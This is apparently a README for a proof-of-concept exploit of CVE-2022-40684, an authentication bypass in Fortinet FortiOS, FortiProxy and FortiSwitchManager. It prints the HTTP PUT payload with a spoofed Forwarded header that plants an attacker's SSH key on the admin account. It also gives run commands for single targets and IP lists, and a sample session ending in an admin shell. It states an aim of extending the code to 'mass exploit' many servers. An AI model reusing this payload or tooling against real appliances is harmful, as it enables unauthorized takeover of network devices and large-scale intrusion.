For now it's a POC copy for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
Coppied from https://github.com/horizon3ai/CVE-2022-40684
The exploit uses the simple payload:
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1": "fake-key"
}
This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
Develop it for a full scale exploit with multi-targets and multi-servers for mass exploit.
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
or
2. ./cve-2022-40684 <FILE_NAME>
Example:
./cve-2022-40684.sh ips.txt
python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub
The example:
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.